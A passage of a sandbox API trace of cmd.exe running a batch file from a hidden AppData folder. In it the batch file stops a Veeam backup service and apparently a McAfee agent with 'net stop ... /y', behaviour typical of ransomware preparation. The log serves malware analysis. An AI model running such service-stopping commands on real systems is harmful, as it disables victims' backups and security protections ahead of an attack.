0x3f8f70 [0206.456] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.456] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0206.581] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0206.581] CloseHandle (hObject=0x74) returned 1 [0206.581] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0206.581] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0206.581] GetProcessHeap () returned 0x3e0000 [0206.581] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.581] GetEnvironmentStringsW () returned 0x3f8408* [0206.581] GetProcessHeap () returned 0x3e0000 [0206.581] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.582] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.582] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0206.582] GetProcessHeap () returned 0x3e0000 [0206.582] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.582] GetEnvironmentStringsW () returned 0x3f8408* [0206.582] GetProcessHeap () returned 0x3e0000 [0206.582] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.582] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.582] GetProcessHeap () returned 0x3e0000 [0206.582] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0206.582] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0206.582] _get_osfhandle (_FileHandle=1) returned 0x264 [0206.582] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0206.583] _get_osfhandle (_FileHandle=1) returned 0x264 [0206.583] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0206.583] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0206.583] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0206.583] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0206.583] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0206.583] SetConsoleInputExeNameW () returned 0x1 [0206.583] GetConsoleOutputCP () returned 0x1b5 [0206.583] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0206.583] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.584] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0206.584] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0206.584] _get_osfhandle (_FileHandle=3) returned 0x74 [0206.584] SetFilePointer (in: hFile=0x74, lDistanceToMove=4132, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1024 [0206.584] GetProcessHeap () returned 0x3e0000 [0206.584] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0206.584] GetProcessHeap () returned 0x3e0000 [0206.584] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0206.584] GetProcessHeap () returned 0x3e0000 [0206.584] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0206.584] GetProcessHeap () returned 0x3e0000 [0206.584] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0206.584] GetProcessHeap () returned 0x3e0000 [0206.584] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0206.584] GetProcessHeap () returned 0x3e0000 [0206.584] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0206.584] GetProcessHeap () returned 0x3e0000 [0206.584] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0206.584] GetProcessHeap () returned 0x3e0000 [0206.584] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0206.584] GetProcessHeap () returned 0x3e0000 [0206.584] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0206.584] GetProcessHeap () returned 0x3e0000 [0206.584] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0206.584] GetProcessHeap () returned 0x3e0000 [0206.584] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0206.584] GetProcessHeap () returned 0x3e0000 [0206.584] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0206.584] GetProcessHeap () returned 0x3e0000 [0206.584] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0206.585] _get_osfhandle (_FileHandle=3) returned 0x74 [0206.585] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1024 [0206.585] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x89d, lpOverlapped=0x0) returned 1 [0206.585] SetFilePointer (in: hFile=0x74, lDistanceToMove=4167, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1047 [0206.585] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=35, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop VeeamHvIntegrationSvc /y\r\n\n\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 35 [0206.585] _get_osfhandle (_FileHandle=3) returned 0x74 [0206.585] GetFileType (hFile=0x74) returned 0x1 [0206.585] _get_osfhandle (_FileHandle=3) returned 0x74 [0206.585] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1047 [0206.585] GetProcessHeap () returned 0x3e0000 [0206.585] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0206.585] GetProcessHeap () returned 0x3e0000 [0206.585] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0206.589] _tell (_FileHandle=3) returned 4167 [0206.589] _close (_FileHandle=3) returned 0 [0206.589] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0206.589] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0206.589] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0206.589] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0206.589] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0206.589] _wcsicmp (_String1="net", _String2="CD") returned 11 [0206.589] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0206.589] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0206.589] _wcsicmp (_String1="net", _String2="REN") returned -4 [0206.589] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0206.589] _wcsicmp (_String1="net", _String2="SET") returned -5 [0206.589] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0206.589] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0206.589] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0206.589] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0206.589] _wcsicmp (_String1="net", _String2="MD") returned 1 [0206.589] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0206.589] _wcsicmp (_String1="net", _String2="RD") returned -4 [0206.589] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0206.589] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0206.589] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0206.589] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0206.589] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0206.589] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0206.589] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0206.589] _wcsicmp (_String1="net", _String2="VER") returned -8 [0206.589] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0206.589] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0206.589] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0206.589] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0206.589] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0206.589] _wcsicmp (_String1="net", _String2="START") returned -5 [0206.589] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0206.590] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0206.590] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0206.590] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0206.590] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0206.590] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0206.590] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0206.590] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0206.590] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0206.590] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0206.590] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0206.590] SetErrorMode (uMode=0x0) returned 0x1 [0206.590] GetProcessHeap () returned 0x3e0000 [0206.590] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0206.590] GetProcessHeap () returned 0x3e0000 [0206.590] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0206.591] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.591] GetProcessHeap () returned 0x3e0000 [0206.591] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0206.591] GetProcessHeap () returned 0x3e0000 [0206.591] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0206.591] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0206.591] GetProcessHeap () returned 0x3e0000 [0206.591] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0206.591] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.591] GetProcessHeap () returned 0x3e0000 [0206.591] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0206.592] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0206.592] GetProcessHeap () returned 0x3e0000 [0206.592] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0206.592] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.592] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.592] GetLastError () returned 0x2 [0206.593] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.593] GetLastError () returned 0x2 [0206.593] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.594] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0206.594] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.594] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.594] GetLastError () returned 0x2 [0206.595] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0206.595] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.595] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.596] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0206.596] SetErrorMode (uMode=0x0) returned 0x1 [0206.596] GetProcessHeap () returned 0x3e0000 [0206.596] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0206.596] GetProcessHeap () returned 0x3e0000 [0206.596] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0206.596] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.596] GetProcessHeap () returned 0x3e0000 [0206.596] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0206.596] GetProcessHeap () returned 0x3e0000 [0206.596] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0206.597] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0206.597] GetProcessHeap () returned 0x3e0000 [0206.597] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0206.597] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.597] GetProcessHeap () returned 0x3e0000 [0206.597] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0206.597] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0206.597] GetProcessHeap () returned 0x3e0000 [0206.597] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0206.598] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.598] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.598] GetLastError () returned 0x2 [0206.598] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.599] GetLastError () returned 0x2 [0206.599] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.599] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0206.599] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0206.600] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.600] GetLastError () returned 0x2 [0206.600] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0206.600] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0206.601] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.601] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0206.601] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0206.601] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0206.601] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0206.601] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop VeeamHvIntegrationSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop VeeamHvIntegrationSvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop VeeamHvIntegrationSvc /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x4f0, dwThreadId=0x41c)) returned 1 [0206.605] CloseHandle (hObject=0x74) returned 1 [0206.605] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0206.605] GetProcessHeap () returned 0x3e0000 [0206.606] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.606] GetEnvironmentStringsW () returned 0x3f8408* [0206.606] GetProcessHeap () returned 0x3e0000 [0206.606] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.606] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.606] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0206.763] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0206.763] CloseHandle (hObject=0x78) returned 1 [0206.763] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0206.763] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0206.763] GetProcessHeap () returned 0x3e0000 [0206.763] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.763] GetEnvironmentStringsW () returned 0x3f8408* [0206.764] GetProcessHeap () returned 0x3e0000 [0206.764] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.764] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.764] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0206.764] GetProcessHeap () returned 0x3e0000 [0206.764] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.764] GetEnvironmentStringsW () returned 0x3f8408* [0206.764] GetProcessHeap () returned 0x3e0000 [0206.764] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.765] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.765] GetProcessHeap () returned 0x3e0000 [0206.765] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0206.765] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0206.765] _get_osfhandle (_FileHandle=1) returned 0x264 [0206.765] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0206.765] _get_osfhandle (_FileHandle=1) returned 0x264 [0206.765] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0206.765] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0206.765] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0206.765] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0206.765] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0206.766] SetConsoleInputExeNameW () returned 0x1 [0206.766] GetConsoleOutputCP () returned 0x1b5 [0206.766] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0206.766] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0206.766] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0206.766] _get_osfhandle (_FileHandle=3) returned 0x78 [0206.766] SetFilePointer (in: hFile=0x78, lDistanceToMove=4167, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1047 [0206.766] GetProcessHeap () returned 0x3e0000 [0206.766] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0206.766] GetProcessHeap () returned 0x3e0000 [0206.766] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0206.767] GetProcessHeap () returned 0x3e0000 [0206.767] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0206.767] GetProcessHeap () returned 0x3e0000 [0206.767] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0206.767] GetProcessHeap () returned 0x3e0000 [0206.767] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0206.767] GetProcessHeap () returned 0x3e0000 [0206.767] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0206.767] GetProcessHeap () returned 0x3e0000 [0206.767] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0206.767] GetProcessHeap () returned 0x3e0000 [0206.767] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0206.767] GetProcessHeap () returned 0x3e0000 [0206.767] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0206.767] GetProcessHeap () returned 0x3e0000 [0206.767] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0206.767] GetProcessHeap () returned 0x3e0000 [0206.767] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0206.767] GetProcessHeap () returned 0x3e0000 [0206.767] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0206.767] GetProcessHeap () returned 0x3e0000 [0206.767] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0206.767] _get_osfhandle (_FileHandle=3) returned 0x78 [0206.767] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1047 [0206.767] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x87a, lpOverlapped=0x0) returned 1 [0206.767] SetFilePointer (in: hFile=0x78, lDistanceToMove=4186, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x105a [0206.767] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=19, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop masvc /y\r\negrationSvc /y\r\n\n\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 19 [0206.768] _get_osfhandle (_FileHandle=3) returned 0x78 [0206.768] GetFileType (hFile=0x78) returned 0x1 [0206.768] _get_osfhandle (_FileHandle=3) returned 0x78 [0206.768] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x105a [0206.768] GetProcessHeap () returned 